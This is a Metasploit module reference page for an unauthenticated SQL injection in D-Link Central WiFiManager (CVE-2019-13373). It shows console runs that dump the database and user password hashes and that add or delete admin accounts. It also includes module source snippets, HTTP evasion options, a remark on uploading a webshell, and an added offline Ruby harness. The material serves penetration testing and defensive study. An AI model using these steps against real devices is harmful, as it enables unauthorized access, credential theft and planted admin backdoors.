D-Link Central WiFiManager SQL injection - Metasploit
This page contains detailed information about how to use the auxiliary/sqli/dlink/dlink_central_wifimanager_sqli metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: D-Link Central WiFiManager SQL injection
Module: auxiliary/sqli/dlink/dlink_central_wifimanager_sqli
Source code: modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.rb
Disclosure date: 2019-07-06
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2019-13373
This module exploits a SQLi vulnerability found in D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6. The vulnerability is an exposed API endpoint that allows the execution of SQL queries without authentication. Using this vulnerability, it is possible to retrieve usernames and password hashes of registered users, device configuration, and other data; it is also possible to add users or edit database information.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/sqli/dlink/dlink_central_wifimanager_sqli
msf auxiliary(dlink_central_wifimanager_sqli) > show targets
... a list of targets ...
msf auxiliary(dlink_central_wifimanager_sqli) > set TARGET target-id
msf auxiliary(dlink_central_wifimanager_sqli) > show options
... show and set options ...
msf auxiliary(dlink_central_wifimanager_sqli) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
This module exploits a vulnerability in D-Link Central WiFiManager (CWM-100), found in versions lower than v1.03R0100_BETA6, allowing unauthenticated users to execute arbitrary SQL queries.
This module has 3 actions:
| Action | Description |
|---|---|
| SQLI_DUMP | Data retrieval* |
| ADD_ADMIN | Creation of an admin user |
| REMOVE_ADMIN | Removal of an admin user |
* : each table is saved in the loot directory in CSV format; credentials (password hashes) are saved as creds for later cracking.
Tested with version 1.03r098.
Verification Steps
- Download the vulnerable software, and install it
- Run the vulnerable software, downloadable from here.
  - direct download link: `ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip`
- Reproduction steps:
  - Run `msfconsole`
  - `set rhosts ...`
  - `set action ...`
  - `check` or `exploit`
  - should work as in the scenarios below
Actions
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show actions
Auxiliary actions:
Name Description
---- -----------
ADD_ADMIN Add an administrator user
REMOVE_ADMIN Remove a user
SQLI_DUMP Retrieve all the data from the database
Options
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show options
Module options (auxiliary/sqli/dlink/dlink_central_wifimanager_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
Admin_Password anything no The password of the user to add/edit
Admin_Username red0xff no The username of the user to add/remove
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.223 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to DLink CWM-100
VHOST no HTTP server virtual host
Scenarios
This module has both `check` and `run` functions.
Retrieving all the data from the database
msf5 > use auxiliary/sqli/dlink/dlink_central_wifimanager_sqli
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action SQLI_DUMP
action => SQLI_DUMP
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set rhosts 192.168.1.223
rhosts => 192.168.1.223
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > check
[+] 192.168.1.223:443 - The target is vulnerable.
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run
[*] Running module against 192.168.1.223
[+] Target seems vulnerable
[+] DBMS version: PostgreSQL 9.1.0, compiled by Visual C++ build 1500, 32-bit
[*] Enumerating tables
[+] grouptossltable saved to /home/redouane/.msf4/loot/20200828180148_default_192.168.1.223_dlink.http_187571.csv
[+] paypalsettingtable saved to /home/redouane/.msf4/loot/20200828180149_default_192.168.1.223_dlink.http_642251.csv
[+] ordertable saved to /home/redouane/.msf4/loot/20200828180149_default_192.168.1.223_dlink.http_944954.csv
...
[+] tempstationtable saved to /home/redouane/.msf4/loot/20200828180505_default_192.168.1.223_dlink.http_577215.csv
[+] Saved credentials for admin
[+] Saved credentials for red0xff
[+] usertable saved to /home/redouane/.msf4/loot/20200828180153_default_192.168.1.223_dlink.http_608945.csv
...
[+] devicesnmpsecuritytable saved to /home/redouane/.msf4/loot/20200828180154_default_192.168.1.223_dlink.http_825556.csv
[*] Auxiliary module execution completed
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) >
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.1.223 admin 21232f297a57a5a743894a0e4a801fc3 Nonreplayable hash raw-md5
192.168.1.223 red0xff f0e166dc34d14d6c228ffac576c9a43c Nonreplayable hash raw-md5
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) >
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.168.1.223 dlink.http biggrouptable.csv application/csv /home/redouane/.msf4/loot/20200828180503_default_192.168.1.223_dlink.http_360290.csv
192.168.1.223 dlink.http devicetable.csv application/csv /home/redouane/.msf4/loot/20200828180503_default_192.168.1.223_dlink.http_230830.csv
...
192.168.1.223 dlink.http devicesnmpsecuritytable.csv application/csv /home/redouane/.msf4/loot/20200828180506_default_192.168.1.223_dlink.http_086271.csv
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) >
Adding an admin user/changing the password of a user
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action ADD_ADMIN
action => ADD_ADMIN
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Username msfadmin
Admin_Username => msfadmin
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Password msfadmin
Admin_Password => msfadmin
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run
[*] Running module against 192.168.1.223
[+] Target seems vulnerable
[*] User not found on the target, inserting
[*] Auxiliary module execution completed
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Password msfpassword
Admin_Password => msfpassword
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run
[*] Running module against 192.168.1.223
[*] Trying to detect installed version
[+] Target seems vulnerable
[*] User already exists, updating the password
[*] Auxiliary module execution completed
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) >
Deleting an administrator user
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action REMOVE_ADMIN
action => REMOVE_USER
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Username red0xff
Admin_Username => red0xff
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run
[*] Running module against 192.168.1.223
[+] Target seems vulnerable
[*] Auxiliary module execution completed
Going further
It is possible to upload arbitrary files to the target system using queries of the form (copy ... to ...), but since these require full paths, the attacker must know the path of the webroot to upload a webshell this way.
Msfconsole Usage
Here is how the sqli/dlink/dlink_central_wifimanager_sqli auxiliary module looks in the msfconsole:
msf6 > use auxiliary/sqli/dlink/dlink_central_wifimanager_sqli
msf6 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show info
Name: D-Link Central WiFiManager SQL injection
Module: auxiliary/sqli/dlink/dlink_central_wifimanager_sqli
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2019-07-06
Provided by:
M3 <M3@ZionLab from DBAppSecurity>
Redouane NIBOUCHA <[email protected]>
Available actions:
Name Description
---- -----------
ADD_ADMIN Add an administrator user
REMOVE_ADMIN Remove an administrator user
SQLI_DUMP Retrieve all the data from the database
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password of the user to add/edit
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to DLink CWM-100
USERNAME no The username of the user to add/remove
VHOST no HTTP server virtual host
Description:
This module exploits a SQLi vulnerability found in D-Link Central
WiFi Manager CWM(100) before v1.03R0100_BETA6. The vulnerability is
an exposed API endpoint that allows the execution of SQL queries
without authentication, using this vulnerability, it's possible to
retrieve usernames and password hashes of registered users, device
configuration, and other data, it's also possible to add users, or
edit database informations.
References:
https://nvd.nist.gov/vuln/detail/CVE-2019-13373
https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/
Module Options
This is a complete list of options available in the sqli/dlink/dlink_central_wifimanager_sqli auxiliary module:
msf6 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show options
Module options (auxiliary/sqli/dlink/dlink_central_wifimanager_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password of the user to add/edit
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to DLink CWM-100
USERNAME no The username of the user to add/remove
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
SQLI_DUMP Retrieve all the data from the database
Advanced Options
Here is a complete list of advanced options supported by the sqli/dlink/dlink_central_wifimanager_sqli auxiliary module:
msf6 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show advanced
Module advanced options (auxiliary/sqli/dlink/dlink_central_wifimanager_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SqliDelay 1.0 no The delay to sleep on time-based blind SQL injections
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the sqli/dlink/dlink_central_wifimanager_sqli module can do:
msf6 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show actions
Auxiliary actions:
Name Description
---- -----------
ADD_ADMIN Add an administrator user
REMOVE_ADMIN Remove an administrator user
SQLI_DUMP Retrieve all the data from the database
Evasion Options
Here is the full list of possible evasion options supported by the sqli/dlink/dlink_central_wifimanager_sqli auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Failed to send HTTP request
Here is a relevant code snippet related to the "Failed to send HTTP request" error message:
73: res.body[%r{<column>(.+)</column>}m, 1] || ''
74: else
75: if res
76: check_error = Exploit::CheckCode::Safe
77: else
78: check_error = Exploit::CheckCode::Unknown('Failed to send HTTP request')
79: end
80: '' # because a String is expected, this will make test_vulnerable to return false, but we will just get check_error
81: end
82: end
83: vulnerable_test = sqli.test_vulnerable
You must specify a username when adding a user
Here is a relevant code snippet related to the "You must specify a username when adding a user" error message:
123: end
124: end
125:
126: def check_admin_username
127: if datastore['USERNAME'].nil?
128: fail_with Failure::BadConfig, 'You must specify a username when adding a user'
129: elsif ['\\', '\''].any? { |c| datastore['USERNAME'].include?(c) }
130: fail_with Failure::BadConfig, 'Admin username cannot contain single quotes or backslashes'
131: end
132: end
133:
Admin username cannot contain single quotes or backslashes
Here is a relevant code snippet related to the "Admin username cannot contain single quotes or backslashes" error message:
125:
126: def check_admin_username
127: if datastore['USERNAME'].nil?
128: fail_with Failure::BadConfig, 'You must specify a username when adding a user'
129: elsif ['\\', '\''].any? { |c| datastore['USERNAME'].include?(c) }
130: fail_with Failure::BadConfig, 'Admin username cannot contain single quotes or backslashes'
131: end
132: end
133:
134: def add_user(sqli)
135: check_admin_username
User not found on the target, inserting
Here is a relevant code snippet related to the "User not found on the target, inserting" error message:
135: check_admin_username
136: admin_hash = Digest::MD5.hexdigest(datastore['PASSWORD'] || '')
137: user_exists_sql = "select count(1) from usertable where username='#{datastore['USERNAME']}'"
138: # check if user exists, if yes, just change his password
139: if sqli.run_sql(user_exists_sql).to_i == 0
140: print_status 'User not found on the target, inserting'
141: sqli.run_sql('insert into usertable(username,userpassword,level) values(' \
142: "'#{datastore['USERNAME']}', '#{admin_hash}', 1)")
143: else
144: print_status 'User already exists, updating the password'
145: sqli.run_sql("update usertable set userpassword='#{admin_hash}' where " \
Target does not seem to be vulnerable
Here is a relevant code snippet related to the "Target does not seem to be vulnerable" error message:
152: sqli.run_sql("delete from usertable where username='#{datastore['USERNAME']}'")
153: end
154:
155: def run
156: unless check == Exploit::CheckCode::Vulnerable
157: print_error 'Target does not seem to be vulnerable'
158: return
159: end
160: print_good 'Target seems vulnerable'
161: sqli = create_sqli(dbms: PostgreSQLi::Common, opts: { encoder: :base64 }) do |payload|
162: res = vulnerable_request(payload)
Failed to send HTTP request
Here is a relevant code snippet related to the "Failed to send HTTP request" error message:
161: sqli = create_sqli(dbms: PostgreSQLi::Common, opts: { encoder: :base64 }) do |payload|
162: res = vulnerable_request(payload)
163: if res && res.code == 200
164: res.body[%r{<column>(.+)</column>}m, 1] || ''
165: else
166: fail_with Failure::Unreachable, 'Failed to send HTTP request' unless res
167: fail_with Failure::NotVulnerable, "Got #{res.code} response code" unless res.code == 200
168: end
169: end
170: case action.name
171: when 'SQLI_DUMP'
Got <RES.CODE> response code
Here is a relevant code snippet related to the "Got <RES.CODE> response code" error message:
162: res = vulnerable_request(payload)
163: if res && res.code == 200
164: res.body[%r{<column>(.+)</column>}m, 1] || ''
165: else
166: fail_with Failure::Unreachable, 'Failed to send HTTP request' unless res
167: fail_with Failure::NotVulnerable, "Got #{res.code} response code" unless res.code == 200
168: end
169: end
170: case action.name
171: when 'SQLI_DUMP'
172: dump_data(sqli)
<ACTION.NAME> not defined
Here is a relevant code snippet related to the "<ACTION.NAME> not defined" error message:
171: when 'SQLI_DUMP'
172: dump_data(sqli)
173: when 'ADD_ADMIN'
174: add_user(sqli)
175: when 'REMOVE_ADMIN'
176: remove_user(sqli)
177: else
178: fail_with(Failure::BadConfig, "#{action.name} not defined")
179: end
180: end
181: end
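The ADD_ADMIN/REMOVE_ADMIN flow from the scenarios and the snippets above, exercised offline in Ruby against a constructed in-memory usertable. This is an added example, not the module's code: OfflineUsertable, its query matching, and the assumed WHERE clause of the update statement (cut off on this page) are assumptions made here.

```ruby
require 'digest'

# Added, offline stand-in for the module's `sqli` object (not Metasploit code):
# it keeps a small in-memory usertable and answers only the query shapes that
# add_user/remove_user on this page emit, so the flow runs without a CWM-100.
class OfflineUsertable
  attr_reader :users, :queries

  def initialize(users)
    @users = users.dup   # username => unsalted MD5 hex of the password (raw-md5)
    @queries = []        # every SQL string handed to run_sql, for inspection
  end

  def run_sql(sql)
    @queries << sql
    case sql
    when /\Aselect count\(1\) from usertable where username='([^']*)'\z/
      @users.key?($1) ? '1' : '0'
    when /\Ainsert into usertable\(username,userpassword,level\) values\('([^']*)', '(\h{32})', 1\)\z/
      @users[$1] = $2
      ''
    when /\Aupdate usertable set userpassword='(\h{32})' where username='([^']*)'\z/
      @users[$2] = $1 if @users.key?($2)
      ''
    when /\Adelete from usertable where username='([^']*)'\z/
      @users.delete($1)
      ''
    else
      raise ArgumentError, "unexpected query: #{sql}"
    end
  end
end

# Same rule as the module's check_admin_username: the name is interpolated
# straight into SQL strings, so quotes and backslashes are refused up front.
def check_admin_username(username)
  raise ArgumentError, 'You must specify a username when adding a user' if username.nil?
  if ['\\', '\''].any? { |c| username.include?(c) }
    raise ArgumentError, 'Admin username cannot contain single quotes or backslashes'
  end
  username
end

# Mirrors ADD_ADMIN: insert when absent, otherwise update the password. The
# update's WHERE clause is cut off on this page; assumed to be username='...'.
def add_user(sqli, username, password)
  check_admin_username(username)
  admin_hash = Digest::MD5.hexdigest(password || '')
  if sqli.run_sql("select count(1) from usertable where username='#{username}'").to_i == 0
    sqli.run_sql("insert into usertable(username,userpassword,level) values('#{username}', '#{admin_hash}', 1)")
    :inserted
  else
    sqli.run_sql("update usertable set userpassword='#{admin_hash}' where username='#{username}'")
    :updated
  end
end

# Mirrors REMOVE_ADMIN.
def remove_user(sqli, username)
  check_admin_username(username)
  sqli.run_sql("delete from usertable where username='#{username}'")
  :removed
end
```

Because the usertable stores unsalted MD5 (the raw-md5 JtR format in the creds listing), the constructed admin entry used when exercising this harness is simply the MD5 of its password, which is why a dumped hash can be compared against a guess with a single Digest::MD5 call.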
Related Pull Requests
- #14734 Merged Pull Request: Rubocop recently landed modules
- #14067 Merged Pull Request: [GSoC] Module for CVE-2019-13375, and PostgreSQL support for the library
See Also
Check also the following modules related to this module:
- auxiliary/admin/http/dlink_dir_300_600_exec_noauth
- auxiliary/admin/http/dlink_dir_645_password_extractor
- auxiliary/admin/http/dlink_dsl320b_password_extractor
- auxiliary/admin/vxworks/dlink_i2eye_autoanswer
- auxiliary/scanner/http/dlink_dir_300_615_http_login
- auxiliary/scanner/http/dlink_dir_615h_http_login
- auxiliary/scanner/http/dlink_dir_session_cgi_http_login
- auxiliary/scanner/http/dlink_user_agent_backdoor
- exploit/linux/http/dlink_authentication_cgi_bof
- exploit/linux/http/dlink_command_php_exec_noauth
- exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution
- exploit/linux/http/dlink_dcs931l_upload
- exploit/linux/http/dlink_diagnostic_exec_noauth
- exploit/linux/http/dlink_dir300_exec_telnet
- exploit/linux/http/dlink_dir605l_captcha_bof
- exploit/linux/http/dlink_dir615_up_exec
- exploit/linux/http/dlink_dir850l_unauth_exec
- exploit/linux/http/dlink_dsl2750b_exec_noauth
- exploit/linux/http/dlink_dspw110_cookie_noauth_exec
- exploit/linux/http/dlink_dspw215_info_cgi_bof
- exploit/linux/http/dlink_dwl_2600_command_injection
- exploit/linux/http/dlink_hedwig_cgi_bof
- exploit/linux/http/dlink_hnap_bof
- exploit/linux/http/dlink_hnap_header_exec_noauth
- exploit/linux/http/dlink_hnap_login_bof
- exploit/linux/http/dlink_upnp_exec_noauth
- exploit/linux/upnp/dlink_dir859_exec_ssdpcgi
- exploit/linux/upnp/dlink_dir859_subscribe_exec
- exploit/linux/upnp/dlink_upnp_msearch_exec
- exploit/windows/http/dlink_central_wifimanager_rce
- exploit/windows/tftp/dlink_long_filename
- auxiliary/scanner/http/manageengine_desktop_central_login
- exploit/windows/http/desktopcentral_deserialization
- exploit/windows/http/desktopcentral_file_upload
- exploit/windows/http/desktopcentral_statusupdate_upload
Authors
- M3@ZionLab from DBAppSecurity
- Redouane NIBOUCHA <rniboucha[at]yahoo.fr>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.